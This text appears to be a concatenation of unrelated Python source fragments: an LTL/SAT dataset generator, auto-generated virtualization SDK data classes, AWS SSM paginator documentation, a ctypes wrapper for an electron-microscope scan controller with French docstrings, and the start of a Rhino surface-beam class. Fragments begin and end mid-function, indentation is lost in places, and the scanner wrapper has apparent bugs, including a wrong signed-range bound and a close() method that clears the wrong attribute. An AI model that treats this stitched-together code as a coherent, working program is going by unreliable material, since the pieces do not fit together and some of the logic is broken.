        info['avg_log_model_pre_percent'] = accu['log_model_frac'] / sat_examples * 100
        print('Average log model count: {avg_log_model_count:.1f} / {avg_log_model_poss:.1f} (post {avg_log_model_percent:.1f}%; pre {avg_log_model_pre_percent:.1f}%)'.format(**info))
    if params.include_solve_time:
        info['avg_solve_time'] = accu['solve_time'] / total_examples
        print('Average solve time: {avg_solve_time:.2f} ms'.format(**info))
    if params.include_solver_statistics and params.problem == 'ltl' and params.ltl_solver == 'leviathan':
        for k in ['lev_evtls', 'lev_frames', 'lev_steps', 'lev_max_model_size', 'lev_max_depth']:
            info['avg_' + k] = accu[k] / total_examples
        print('Average leviathan statistics: {avg_lev_evtls:.1f} eventualities, {avg_lev_frames:.1f} frames, {avg_lev_steps:.1f} steps, {avg_lev_max_model_size:.1f} max model size, {avg_lev_max_depth:.1f} max depth'.format(**info))
    info['avg_in_length'] = accu['in_length'] / total_examples
    info['avg_out_length'] = accu['out_length'] / sat_examples
    info['runtime'] = utils.strfdelta_hms(datetime.datetime.now() - time_started)
    # Underscore-prefixed entries carry objects (not serialized by callers).
    info['_dist_gate'] = dist_gate
    info['_tictoc'] = tictoc
    info['examples_generated'] = total_examples
    info['examples_generated_sat'] = sat_examples
    info['examples_generated_unsat'] = unsat_examples
    print('Average formula length {avg_in_length:.1f} and witness length {avg_out_length:.1f}'.format(**info))
    print('Generated {:d} examples ({:d} sat, {:d} unsat). {:d} requested.'.format(total_examples, sat_examples, unsat_examples, params.num_examples))
    return examples, timeout_formulas, info
def split_and_write(examples, timeouts, params, log_dict):
random.Random(params.seed).shuffle(examples)
num_examples = len(examples)
res = {}
total_val = sum(params.splits.values())
current_val = 0.0
for split, val in params.splits.items():
res[split] = examples[int(current_val/total_val * num_examples) : int((current_val + val)/total_val * num_examples)]
current_val += val
assert params.file_format == 'text/2lines'
if params.include_simplified_formula:
log_dict['file_format'] += '+simplified_formula'
if params.include_log_model_count:
log_dict['file_format'] += '+log_model_count'
try:
if params.solution_choice == 'all':
log_dict['file_format'] += '+all_solutions'
except AttributeError:
pass # so sorry
if params.include_solve_time:
log_dict['file_format'] += '+solve_time'
if params.include_solver_statistics:
log_dict['file_format'] += '+solver_statistics'
print(f'Writing dataset of {num_examples} to {params.output_dir}...')
gfile.makedirs(params.output_dir)
for split, data in res.items():
path = os.path.join(params.output_dir, split + '.txt')
with gfile.GFile(path, 'w') as f:
for ex_in, ex_out, d in data:
f.write(ex_in)
if params.include_simplified_formula:
f.write(' #simplified_formula: ' + d['simplified_formula'].to_str('network-'+ params.operator_notation))
| |
permits(self):
"""
Returns the value of the `permits` property.
"""
return self._permits
@permits.setter
def permits(self, value):
"""
Sets the value of the `permits` property.
"""
self._permits = value
@property
def user(self):
"""
Returns the value of the `user` property.
"""
return self._user
@user.setter
def user(self, value):
"""
Sets the value of the `user` property.
"""
Struct._check_type('user', value, User)
self._user = value
class SchedulingPolicy(Identified):
    """
    Describes a scheduling policy with its balance/filter/weight policy-unit
    configuration.  All values are stored through the property setters below.
    """
    def __init__(
        self,
        balances=None,
        comment=None,
        default_policy=None,
        description=None,
        filters=None,
        id=None,
        locked=None,
        name=None,
        properties=None,
        weight=None,
    ):
        super(SchedulingPolicy, self).__init__(
            comment=comment,
            description=description,
            id=id,
            name=name,
        )
        # Assignment goes through the property setters, which store the
        # values in underscore-prefixed attributes.
        self.balances = balances
        self.default_policy = default_policy
        self.filters = filters
        self.locked = locked
        self.properties = properties
        self.weight = weight

    @property
    def balances(self):
        """
        Returns the value of the `balances` property.
        """
        return self._balances

    @balances.setter
    def balances(self, value):
        """
        Sets the value of the `balances` property.
        """
        self._balances = value

    @property
    def default_policy(self):
        """
        Returns the value of the `default_policy` property.
        """
        return self._default_policy

    @default_policy.setter
    def default_policy(self, value):
        """
        Sets the value of the `default_policy` property.
        """
        self._default_policy = value

    @property
    def weight(self):
        """
        Returns the value of the `weight` property.
        """
        return self._weight

    @weight.setter
    def weight(self, value):
        """
        Sets the value of the `weight` property.
        """
        self._weight = value

    @property
    def filters(self):
        """
        Returns the value of the `filters` property.
        """
        return self._filters

    @filters.setter
    def filters(self, value):
        """
        Sets the value of the `filters` property.
        """
        self._filters = value

    @property
    def locked(self):
        """
        Returns the value of the `locked` property.
        """
        return self._locked

    @locked.setter
    def locked(self, value):
        """
        Sets the value of the `locked` property.
        """
        self._locked = value

    @property
    def properties(self):
        """
        Returns the value of the `properties` property.
        """
        return self._properties

    @properties.setter
    def properties(self, value):
        """
        Sets the value of the `properties` property.
        """
        self._properties = value
class SchedulingPolicyUnit(Identified):
    """
    A single unit (filter, weight or balance module) of a scheduling policy.
    The `type` setter validates against PolicyUnitType.
    """
    def __init__(
        self,
        comment=None,
        description=None,
        enabled=None,
        id=None,
        internal=None,
        name=None,
        properties=None,
        type=None,
    ):
        super(SchedulingPolicyUnit, self).__init__(
            comment=comment,
            description=description,
            id=id,
            name=name,
        )
        # Assignment goes through the property setters below.
        self.enabled = enabled
        self.internal = internal
        self.properties = properties
        self.type = type

    @property
    def internal(self):
        """
        Returns the value of the `internal` property.
        """
        return self._internal

    @internal.setter
    def internal(self, value):
        """
        Sets the value of the `internal` property.
        """
        self._internal = value

    @property
    def type(self):
        """
        Returns the value of the `type` property.
        """
        return self._type

    @type.setter
    def type(self, value):
        """
        Sets the value of the `type` property.
        """
        Struct._check_type('type', value, PolicyUnitType)
        self._type = value

    @property
    def enabled(self):
        """
        Returns the value of the `enabled` property.
        """
        return self._enabled

    @enabled.setter
    def enabled(self, value):
        """
        Sets the value of the `enabled` property.
        """
        self._enabled = value

    @property
    def properties(self):
        """
        Returns the value of the `properties` property.
        """
        return self._properties

    @properties.setter
    def properties(self, value):
        """
        Sets the value of the `properties` property.
        """
        self._properties = value
class SeLinux(Struct):
    """Carries a single type-checked `mode` attribute (`SeLinuxMode`)."""

    def __init__(
        self,
        mode=None,
    ):
        super(SeLinux, self).__init__()
        self.mode = mode

    @property
    def mode(self):
        """Value of the `mode` property."""
        return self._mode

    @mode.setter
    def mode(self, value):
        """Assign the `mode` property; must be a `SeLinuxMode`."""
        Struct._check_type('mode', value, SeLinuxMode)
        self._mode = value
class SerialNumber(Struct):
    """Holds a `policy` (`SerialNumberPolicy`) and a `value`."""

    def __init__(
        self,
        policy=None,
        value=None,
    ):
        super(SerialNumber, self).__init__()
        self.policy = policy
        self.value = value

    @property
    def policy(self):
        """Value of the `policy` property."""
        return self._policy

    @policy.setter
    def policy(self, value):
        """Assign the `policy` property; must be a `SerialNumberPolicy`."""
        Struct._check_type('policy', value, SerialNumberPolicy)
        self._policy = value

    @property
    def value(self):
        """Value of the `value` property."""
        return self._value

    @value.setter
    def value(self, value):
        """Assign the `value` property."""
        self._value = value
class Session(Identified):
    """An identified session, tying together `console_user`, `ip`,
    `protocol`, `user` and `vm`."""

    def __init__(
        self,
        comment=None,
        console_user=None,
        description=None,
        id=None,
        ip=None,
        name=None,
        protocol=None,
        user=None,
        vm=None,
    ):
        super(Session, self).__init__(
            comment=comment,
            description=description,
            id=id,
            name=name,
        )
        self.console_user = console_user
        self.ip = ip
        self.protocol = protocol
        self.user = user
        self.vm = vm

    @property
    def console_user(self):
        """Value of the `console_user` property."""
        return self._console_user

    @console_user.setter
    def console_user(self, value):
        """Assign the `console_user` property."""
        self._console_user = value

    @property
    def ip(self):
        """Value of the `ip` property."""
        return self._ip

    @ip.setter
    def ip(self, value):
        """Assign the `ip` property; must be an `Ip`."""
        Struct._check_type('ip', value, Ip)
        self._ip = value

    @property
    def protocol(self):
        """Value of the `protocol` property."""
        return self._protocol

    @protocol.setter
    def protocol(self, value):
        """Assign the `protocol` property."""
        self._protocol = value

    @property
    def user(self):
        """Value of the `user` property."""
        return self._user

    @user.setter
    def user(self, value):
        """Assign the `user` property; must be a `User`."""
        Struct._check_type('user', value, User)
        self._user = value

    @property
    def vm(self):
        """Value of the `vm` property."""
        return self._vm

    @vm.setter
    def vm(self, value):
        """Assign the `vm` property; must be a `Vm`."""
        Struct._check_type('vm', value, Vm)
        self._vm = value
class SkipIfConnectivityBroken(Struct):
    """Carries an `enabled` flag and a `threshold`."""

    def __init__(
        self,
        enabled=None,
        threshold=None,
    ):
        super(SkipIfConnectivityBroken, self).__init__()
        self.enabled = enabled
        self.threshold = threshold

    @property
    def enabled(self):
        """Value of the `enabled` property."""
        return self._enabled

    @enabled.setter
    def enabled(self, value):
        """Assign the `enabled` property."""
        self._enabled = value

    @property
    def threshold(self):
        """Value of the `threshold` property."""
        return self._threshold

    @threshold.setter
    def threshold(self, value):
        """Assign the `threshold` property."""
        self._threshold = value
class SkipIfSdActive(Struct):
    """Carries a single `enabled` flag."""

    def __init__(
        self,
        enabled=None,
    ):
        super(SkipIfSdActive, self).__init__()
        self.enabled = enabled

    @property
    def enabled(self):
        """Value of the `enabled` property."""
        return self._enabled

    @enabled.setter
    def enabled(self, value):
        """Assign the `enabled` property."""
        self._enabled = value
class SpecialObjects(Struct):
    """Holds a `blank_template` (`Template`) and a `root_tag` (`Tag`)."""

    def __init__(
        self,
        blank_template=None,
        root_tag=None,
    ):
        super(SpecialObjects, self).__init__()
        self.blank_template = blank_template
        self.root_tag = root_tag

    @property
    def blank_template(self):
        """Value of the `blank_template` property."""
        return self._blank_template

    @blank_template.setter
    def blank_template(self, value):
        """Assign the `blank_template` property; must be a `Template`."""
        Struct._check_type('blank_template', value, Template)
        self._blank_template = value

    @property
    def root_tag(self):
        """Value of the `root_tag` property."""
        return self._root_tag

    @root_tag.setter
    def root_tag(self, value):
        """Assign the `root_tag` property; must be a `Tag`."""
        Struct._check_type('root_tag', value, Tag)
        self._root_tag = value
class Spm(Struct):
    """Holds a `priority` and a type-checked `status` (`SpmStatus`)."""

    def __init__(
        self,
        priority=None,
        status=None,
    ):
        super(Spm, self).__init__()
        self.priority = priority
        self.status = status

    @property
    def priority(self):
        """Value of the `priority` property."""
        return self._priority

    @priority.setter
    def priority(self, value):
        """Assign the `priority` property."""
        self._priority = value

    @property
    def status(self):
        """Value of the `status` property."""
        return self._status

    @status.setter
    def status(self, value):
        """Assign the `status` property; must be an `SpmStatus`."""
        Struct._check_type('status', value, SpmStatus)
        self._status = value
class Ssh(Identified):
    """An identified SSH description: `authentication_method`,
    `fingerprint`, `port`, `public_key` and `user`."""

    def __init__(
        self,
        authentication_method=None,
        comment=None,
        description=None,
        fingerprint=None,
        id=None,
        name=None,
        port=None,
        public_key=None,
        user=None,
    ):
        super(Ssh, self).__init__(
            comment=comment,
            description=description,
            id=id,
            name=name,
        )
        self.authentication_method = authentication_method
        self.fingerprint = fingerprint
        self.port = port
        self.public_key = public_key
        self.user = user

    @property
    def authentication_method(self):
        """Value of the `authentication_method` property."""
        return self._authentication_method

    @authentication_method.setter
    def authentication_method(self, value):
        """Assign the `authentication_method` property; must be an
        `SshAuthenticationMethod`."""
        Struct._check_type('authentication_method', value, SshAuthenticationMethod)
        self._authentication_method = value

    @property
    def fingerprint(self):
        """Value of the `fingerprint` property."""
        return self._fingerprint

    @fingerprint.setter
    def fingerprint(self, value):
        """Assign the `fingerprint` property."""
        self._fingerprint = value

    @property
    def port(self):
        """Value of the `port` property."""
        return self._port

    @port.setter
    def port(self, value):
        """Assign the `port` property."""
        self._port = value

    @property
    def public_key(self):
        """Value of the `public_key` property."""
        return self._public_key

    @public_key.setter
    def public_key(self, value):
        """Assign the `public_key` property."""
        self._public_key = value

    @property
    def user(self):
        """Value of the `user` property."""
        return self._user

    @user.setter
    def user(self, value):
        """Assign the `user` property; must be a `User`."""
        Struct._check_type('user', value, User)
        self._user = value
class SshPublicKey(Identified):
def __init__(
self,
comment=None,
content=None,
description=None,
id=None,
name=None,
user=None,
):
super(SshPublicKey, self).__init__(
comment=comment,
description=description,
id=id,
name=name,
)
self.content = content
self.user = user
@property
def user(self):
"""
Returns the value of the `user` property.
"""
return self._user
@user.setter
def user(self, value):
"""
Sets the value of the `user` property.
"""
Struct._check_type('user', value, User)
| |
The default value is Abort.
- **MaxAttempts** *(integer) --*
The maximum number of tries to run the action of the step. The default value is 1.
- **ExecutionStartTime** *(datetime) --*
If a step has begun execution, this contains the time the step started. If the step is in Pending status, this field is not populated.
- **ExecutionEndTime** *(datetime) --*
If a step has finished execution, this contains the time the execution ended. If the step has not yet concluded, this field is not populated.
- **StepStatus** *(string) --*
The execution status for this step. Valid values include: Pending, InProgress, Success, Cancelled, Failed, and TimedOut.
- **ResponseCode** *(string) --*
The response code returned by the execution of the step.
- **Inputs** *(dict) --*
Fully-resolved values passed into the step before execution.
- *(string) --*
- *(string) --*
- **Outputs** *(dict) --*
Returned values from the execution of the step.
- *(string) --*
- *(list) --*
- *(string) --*
- **Response** *(string) --*
A message associated with the response code for an execution.
- **FailureMessage** *(string) --*
If a step failed, this message explains why the execution failed.
- **FailureDetails** *(dict) --*
Information about the Automation failure.
- **FailureStage** *(string) --*
The stage of the Automation execution when the failure occurred. The stages include the following: InputValidation, PreVerification, Invocation, PostVerification.
- **FailureType** *(string) --*
The type of Automation failure. Failure types include the following: Action, Permission, Throttling, Verification, Internal.
- **Details** *(dict) --*
Detailed information about the Automation step failure.
- *(string) --*
- *(list) --*
- *(string) --*
- **StepExecutionId** *(string) --*
The unique ID of a step execution.
- **OverriddenParameters** *(dict) --*
A user-specified list of parameters to override when running a step.
- *(string) --*
- *(list) --*
- *(string) --*
- **IsEnd** *(boolean) --*
The flag which can be used to end automation no matter whether the step succeeds or fails.
- **NextStep** *(string) --*
The next step after the step succeeds.
- **IsCritical** *(boolean) --*
The flag which can be used to help decide whether the failure of current step leads to the Automation failure.
- **ValidNextSteps** *(list) --*
Strategies used when step fails, we support Continue and Abort. Abort will fail the automation when the step fails. Continue will ignore the failure of current step and allow automation to run the next step. With conditional branching, we add step:stepName to support the automation to go to another specific step.
- *(string) --*
- **Targets** *(list) --*
The targets for the step execution.
- *(dict) --*
An array of search criteria that targets instances using a Key,Value combination that you specify. ``Targets`` is required if you don't provide one or more instance IDs in the call.
- **Key** *(string) --*
User-defined criteria for sending commands that target instances that meet the criteria. ``Key`` can be ``tag:<Amazon EC2 tag>`` or ``InstanceIds`` . For more information about how to send commands that target instances using ``Key,Value`` parameters, see `Using Targets and Rate Controls to Send Commands to a Fleet <https://docs.aws.amazon.com/systems-manager/latest/userguide/send-commands-multiple.html#send-commands-targeting>`__ in the *AWS Systems Manager User Guide* .
- **Values** *(list) --*
User-defined criteria that maps to ``Key`` . For example, if you specified ``tag:ServerRole`` , you could specify ``value:WebServer`` to run a command on instances that include Amazon EC2 tags of ``ServerRole,WebServer`` . For more information about how to send commands that target instances using ``Key,Value`` parameters, see `Using Targets and Rate Controls to Send Commands to a Fleet <https://docs.aws.amazon.com/systems-manager/latest/userguide/send-commands-multiple.html>`__ in the *AWS Systems Manager User Guide* .
- *(string) --*
- **TargetLocation** *(dict) --*
The combination of AWS Regions and accounts targeted by the current Automation execution.
- **Accounts** *(list) --*
The AWS accounts targeted by the current Automation execution.
- *(string) --*
- **Regions** *(list) --*
The AWS Regions targeted by the current Automation execution.
- *(string) --*
- **TargetLocationMaxConcurrency** *(string) --*
The maximum number of AWS accounts and AWS regions allowed to run the Automation concurrently
- **TargetLocationMaxErrors** *(string) --*
The maximum number of errors allowed before the system stops queueing additional Automation executions for the currently running Automation.
- **ExecutionRoleName** *(string) --*
The Automation execution role used by the currently running Automation.
:type AutomationExecutionId: string
:param AutomationExecutionId: **[REQUIRED]**
The Automation execution ID for which you want step execution descriptions.
:type Filters: list
:param Filters:
One or more filters to limit the number of step executions returned by the request.
- *(dict) --*
A filter to limit the amount of step execution information returned by the call.
- **Key** *(string) --* **[REQUIRED]**
One or more keys to limit the results. Valid filter keys include the following: StepName, Action, StepExecutionId, StepExecutionStatus, StartTimeBefore, StartTimeAfter.
- **Values** *(list) --* **[REQUIRED]**
The values of the filter key.
- *(string) --*
:type ReverseOrder: boolean
:param ReverseOrder:
A boolean that indicates whether to list step executions in reverse order by start time. The default value is false.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeAvailablePatches(Paginator):
def paginate(self, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`SSM.Client.describe_available_patches`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ssm-2014-11-06/DescribeAvailablePatches>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Key': 'string',
'Values': [
'string',
]
},
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Patches': [
{
'Id': 'string',
'ReleaseDate': datetime(2015, 1, 1),
'Title': 'string',
'Description': 'string',
'ContentUrl': 'string',
'Vendor': 'string',
'ProductFamily': 'string',
'Product': 'string',
'Classification': 'string',
'MsrcSeverity': 'string',
'KbNumber': 'string',
'MsrcNumber': 'string',
'Language': 'string'
},
],
}
**Response Structure**
- *(dict) --*
- **Patches** *(list) --*
An array of patches. Each entry in the array is a patch structure.
- *(dict) --*
Represents metadata about a patch.
- **Id** *(string) --*
The ID of the patch (this is different than the Microsoft Knowledge Base ID).
- **ReleaseDate** *(datetime) --*
The date the patch was released.
- **Title** *(string) --*
The title of the patch.
- **Description** *(string) --*
The description of the patch.
- **ContentUrl** *(string) --*
The URL where more information can be obtained about the patch.
- **Vendor** *(string) --*
The name of the vendor providing the patch.
- **ProductFamily** *(string) --*
The product family the patch is applicable for (for example, Windows).
- **Product** *(string) --*
The specific product the patch is applicable for (for example, WindowsServer2016).
- **Classification** *(string) --*
The classification of the patch (for example, SecurityUpdates, Updates, CriticalUpdates).
- **MsrcSeverity** *(string) --*
The severity of the patch (for example Critical, Important, Moderate).
- **KbNumber** *(string) --*
The Microsoft Knowledge Base ID of the patch.
- **MsrcNumber** *(string) --*
The ID of the MSRC bulletin the patch is related to.
- **Language** *(string) --*
The language of the patch if it's language-specific.
:type Filters: list
:param Filters:
Filters used to scope down the returned patches.
- *(dict) --*
Defines a filter used in Patch Manager APIs.
- **Key** *(string) | |
= cproduct.value
self._revision = crevision.value
self._serialnumber = cserialnumber.value
self._major = cmajor.value
self._minor = cminor.value
if self._major < 5:
raise AttributeError("No device connected")
self.__drift_tube = {"offset": 0.0, "gain": 1.0/10.0, "range": {"min":-10.0, "max":10.0}, "value": 0.0}
drift_tube = {"offset": 0.002, "gain": 1.0/5.005}
self.drift_tube_calibration = drift_tube
    def close(self):
        """Close the underlying scan device and drop its handle."""
        self.__OrsayScanClose(self.orsayscan)
        # NOTE(review): this clears `orsaycamera`, not `orsayscan` — looks
        # like a copy/paste slip from a camera wrapper; confirm which
        # attribute the rest of the class expects to be None after close().
        self.orsaycamera = None
def __verifyUnsigned32Bit(self, value):
"""
Check if value is in range 0 <= value <= 0xffffffff
"""
if(value < 0 or value > 0xffffffff):
raise AttributeError("Argument out of range (must be 32bit unsigned).")
def __verifySigned32Bit(self, value):
"""
Check if value is in range 0 <= value <= 0xffffffff
"""
if(value < 0x8000000 or value > 0x7fffffff):
raise AttributeError("Argument out of range (must be 32bit signed).")
def __verifyPositiveInt(self, value):
"""
Check if value is in range 0 <= value <= 0xffffffff
"""
if(value < 0 or value > 0x7fffffff):
raise AttributeError("Argument out of range (must be positive 32bit signed).")
def __verifyStrictlyPositiveInt(self, value):
"""
Check if value is in range 0 < value <= 0xffffffff
"""
if(value < 0 or value > 0x7fffffff):
raise AttributeError("Argument out of range (must be positive 32bit signed).")
def getInputsCount(self) -> int:
"""
Donne le nombre d'entrées vidéo actives
"""
return self.__OrsayScangetInputsCount(self.orsayscan)
def getInputProperties(self, input : int) -> (int, float, str, int):
"""
Lit les propriétés de l'entrée vidéo
Retourne 3 valeurs: bool vrai si unipolaire, double offset, string nom, index de l'entrée.
"""
unipolar = c_bool()
offset = c_double()
buffer = _createCharBuffer23(100)
res = self.__OrsayScanGetInputProperties(self.orsayscan, input, byref(unipolar), byref(offset), buffer)
return unipolar.value, offset.value, _convertToString23(buffer.value), input
def setInputProperties(self, input : int, unipolar : bool, offset : float) -> bool:
"""
change les propriétés de l'entrée vidéo
Pour le moment, seul l'offset est utilisé.
"""
res =self.__OrsayScanSetInputProperties(self.orsayscan, input, offset)
if (not res):
raise Exception("Failed to set orsayscan input properties")
return res
def GetImageTime(self) -> float:
"""
Donne le temps effectif de la durée de balayage d'une image
"""
return self.__OrsayScanGetImageTime(self.orsayscan, self.gene)
def SetInputs(self, inputs : []) -> bool:
"""
Choisit les entrées à lire.
A cause d'une restriction hardware, les valeurs possibles sont 1, 2, 4, 6, 8
"""
inputarray = (c_int * len(inputs))()
k = 0
while (k < len(inputs)):
inputarray[k] = inputs[k]
k = k +1
return self.__OrsayScanSetInputs(self.orsayscan, self.gene, len(inputarray), inputarray)
def GetInputs(self) ->(int, []):
"""
Donne la liste des entrées utilisées
"""
inputarray = (c_int * 20)()
nbinputs = self.__OrsayScanGetInputs(self.orsayscan, self.gene, inputarray)
inputs = []
for inp in range(0, nbinputs):
inputs.append(inputarray[inp])
return nbinputs, inputs
def setImageSize(self, sizex : int, sizey : int) -> bool:
"""
Définit la taille de l'image en pixels
Les limites de dimension sont 1 et 8192
"""
self.__verifyPositiveInt(sizex)
self.__verifyPositiveInt(sizey)
res = self.__OrsayScansetImageSize(self.orsayscan, self.gene, sizex, sizey)
if (not res):
raise Exception("Failed to set orsayscan image size")
def getImageSize(self) -> (int, int):
"""
Donne la taille de l'image
*** il est impératif que le tableau passé à la callback ait cette taille
multiplié par le nombre d'entrées, multiplié par le paramètre lineaveragng ***
"""
sx = c_int()
sy = c_int()
res = self.__OrsayScangetImageSize(self.orsayscan, self.gene, byref(sx), byref(sy))
if (not res):
raise Exception("Failed to get orsayscan image size")
return int(sx.value), int(sy.value)
def setImageArea(self, sizex : int, sizey : int, startx : int, endx : int, starty : int, endy : int) -> bool:
"""
Définit une aire pour le balayage.
Définit une aire pour le balayage.
sizex, sizey taille de l'image complète
startx, endx début et fin de la largeur du rectangle
starty, endy début et fin de la hauteur.
"""
# self.__verifyStrictlyPositiveInt(sizex)
# self.__verifyStrictlyPositiveInt(sizey)
return self.__OrsayScansetImageArea(self.orsayscan, self.gene, sizex, sizey, startx, endx, starty, endy)
def getImageArea(self) -> (bool, int, int, int, int, int, int):
"""
Donne l'aire réduite utilisée,
retourne les paramètres donnés à la fonction setImageArea ou ceux les plus proches valides.
"""
sx, sy, stx, ex, sty, ey = c_int(), c_int(), c_int(), c_int(), c_int(), c_int()
res = self.__OrsayScangetImageArea(self.orsayscan, self.gene, byref(sx), byref(sy), byref(stx), byref(ex), byref(sty), byref(ey))
return res, int(sx.value), int(sy.value), int(stx.value), int(ex.value), int(sty.value), int(ey.value)
@property
def pixelTime(self) -> float:
"""
Donne le temps par pixel
"""
return self.__OrsayScangetPose(self.orsayscan, self.gene)
@pixelTime.setter
def pixelTime(self, value : float):
"""
Définit le temps par pixel
"""
self.__OrsayScansetPose(self.orsayscan, self.gene, value)
#
# Callback qui sera appelée lors d'arrivée de nouvelles données
#
def registerLocker(self, fn):
"""
Définit la fonction callback appelée lorsque de nouvelles données sont présentes
Elle a pour but de passer un tableau image sa dimension et son type de données
On ne doit détruire cet objet avant l'appel d'une fonction unlock
Voir programme demo.
"""
self.__OrsayScanregisterLocker(self.orsayscan, fn)
def registerUnlocker(self, fn):
"""
Definit la fonction appelée à la fin du transfert de données.
recoit newdata vrai si de nouvelles données sont effectivement là.
Utiliser de préférence la fonction registerUnlockerA plus riche en informations sur le flux de données
voir programe demo
"""
self.__OrsayScanregisterUnlocker(self.orsayscan, fn)
def registerUnlockerA(self, fn):
"""
Definit la fonction appelée à la fin du transfert de données.
reçoit newdata, le numéro de séquence de l'image en cours, rect: les coordonnées du rect où les données ont été modifiées.
voir programe demo
"""
self.__OrsayScanregisterUnlockerA(self.orsayscan, fn)
def startSpim(self, mode : int, linesaveraging : int, Nspectra=1, save2D=False) -> bool:
"""
Démarre l'acquitisition de l'image.
mode: --- expliqué plus tard ---
lineaveraging: nombre de lignes à faire avant de passer à la ligne suivante.
retourne vrai si l'acquisition a eu lieu.
"""
return self.__OrsayScanStartSpim(self.orsayscan, self.gene, mode, linesaveraging,Nspectra,save2D)
def setScanClock(self,trigger_input=0) -> bool:
"""
set the input line for starting the next pixel in the STEM imaging (pin 9 and 5 on subD9)
Parameters
----------
trigger_input: 0 for pin 9, 1 for pin 5, 2 for CL ready, 3 for In3, 4 for EELS ready
Returns
-------
"""
return self.__OrsayScanSetScanClock(self.orsayscan, self.gene, trigger_input)
def startImaging(self, mode : int, linesaveraging : int) -> bool:
"""
Démarre l'acquitisition de l'image.
mode: --- expliqué plus tard ---
lineaveraging: nombre de lignes à faire avant de passer à la ligne suivante.
retourne vrai si l'acquisition a eu lieu.
"""
return self.__OrsayScanStartImaging(self.orsayscan, self.gene, mode, linesaveraging)
def stopImaging(self, cancel : bool) -> bool:
"""
Arrete l'acquisition d'images
cancel vrai => immédiat, faux => à la fin du scan de l'image en cours
"""
return self.__OrsayScanStopImaging(self.orsayscan, self.gene, cancel)
def getScanCount(self) -> int:
"""
Donne le nombe de balayages déjà faits
"""
return self.__OrsayScanGetScansCount(self.orsayscan)
def setScanRotation(self, angle : float):
"""
Définit l'angle de rotation du balayage de l'image
"""
self.__OrsayScanSetRotation(self.orsayscan, angle)
def getScanRotation(self) -> float:
"""
Relit la valeur de l'angle de rotation du balayage de l'image
"""
return self.__OrsayScanGetRotation(self.orsayscan)
def setScanScale(self, plug, xamp : float, yamp : float):
"""
Ajuste la taille des signaux analogiques de balayage valeur >0 et inf"rieure à 1.
"""
self.__OrsayScanSetScale(self.orsayscan, plug, xamp, yamp)
def getImagingKind(self) -> int:
kind = self.__OrsayScanGetImagingKind(self.orsayscan, self.gene)
return kind
def setVideoOffset(self, inp : int, offset : float):
"""
Définit l'offset analogique à ajouter au signal d'entrée afin d'avoir une valeur 0 pour 0 volts
En principe, c'est un réglage et pour une machine cela ne devrait pas bouger beaucoup
"""
self.__OrsayScanSetVideoOffset(self.orsayscan, inp, offset)
def getVideoOffset(self, inp : int) -> float:
"""
Donne la valeur de l'offset vidéo
"""
return self.__OrsayScanGetVideoOffset(self.orsayscan, inp)
def SetProbeAt(self, px : int, py : int):
# bool SCAN_EXPORT OrsayScanSetProbeAt(self.orsayscan, int gene, int px, int py);
return self.__OrsayScanSetProbeAt(self.orsayscan, self.gene, px, py)
#void SCAN_EXPORT OrsayScanSetEHT(self.orsayscan, double val);
def SetEHT(self, val):
self.__OrsayScanSetEHT(self.orsayscan,val)
def GetEHT(self):
return self.__OrsayScanGetEHT(self.orsayscan)
#double SCAN_EXPORT OrsayScanGetMaxFieldSize(self.orsayscan);
def GetMaxFieldSize(self):
return self.__OrsayScanGetMaxFieldSize(self.orsayscan)
#double SCAN_EXPORT OrsayScanGetFieldSize(self.orsayscan);
def GetFieldSize(self):
return self.__OrsayScanGetFieldSize(self.orsayscan)
#double SCAN_EXPORT OrsayScanGetScanAngle(self.orsayscan, short *mirror);
def GetScanAngle(self,mirror):
return self.__OrsayScanGetScanAngle(self.orsayscan, mirror)
#bool SCAN_EXPORT OrsayScanSetFieldSize(self.orsayscan, double field);
def SetFieldSize(self,field):
return self.__OrsayScanSetFieldSize(self.orsayscan, field)
#bool SCAN_EXPORT OrsayScanSetBottomBlanking(self.orsayscan, short mode, short source, double beamontime, bool risingedge, unsigned int nbpulses, double delay);
def SetBottomBlanking(self,mode,source,beamontime=0,risingedge=True,nbpulses=0,delay=0):
""" Définit le blanker avant l'échantillon sur un VG/Nion
mode : 0 blanker off, 1 blanker On, 2 controlled by source,
3 controlled by source but with locally defined time (beamontime parametre)
source : to be choosen based on configuration file (eels
camera readout, cl camera readout, | |
<filename>UR_Control/geometry/surface.py<gh_stars>0
import Rhino.Geometry as rg
from geometry.beam import Beam
import copy
import math
class Surface(object):
def __init__(self, surface, u_div=5, v_div=3, beam_width = 160, beam_thickness = 40):
""" Initialization
:param surface: Base rg.geometry object that will be edited
:param u_div: How many divisions this surface will have in the u_direction (default = 5)
:param v_div: How many divisions this surface will have in the v_direction (default = 3)
:param beam_width: The initial width of the beams (default = 160)
:param beam_thickness: The initial thickness of the different beams (default = 40)
"""
domain = rg.Interval(0, 1)
surface.SetDomain(0, domain)
surface.SetDomain(1, domain)
self.surface = surface
self.shared_edges = []
self.bottom_curve = surface.IsoCurve(0, 0)
self.top_curve = surface.IsoCurve(0, 1)
self.left_curve = surface.IsoCurve(1, 0)
self.right_curve = surface.IsoCurve(1, 1)
self.bottom_pt = self.bottom_curve.PointAt(0.5)
self.top_pt = self.top_curve.PointAt(0.5)
self.left_pt = self.left_curve.PointAt(0.5)
self.right_pt = self.right_curve.PointAt(0.5)
self.u_div = u_div
self.v_div = v_div
self.beam_w = beam_width
self.beam_t = beam_thickness
def instantiate_beams(self, mapping_type = 0, seam_type = 0, warp_type = 3, will_flip = False, flush_beam_count = 2):
""" Function that instatiates the beam generation
:param mapping_type: Some default types of surface logics applied ([1] = even - default, [2/3, 1] = seaming type)
:param seam_type: Which type of seam this object has (0 = single flush - default, 1 = multi flush left, 2 = multi flush right, 3 = multi flush both sides)
:param warp_type: How the surface is being warped (0 = no warping - default, 1 = left, 2 = right, 3 = both sides)
:param will_flip: Whether the surface will flip or not (default = False)
"""
self.mapping_type = [[1], [2/3, 1]][mapping_type]
self.seam_type = seam_type
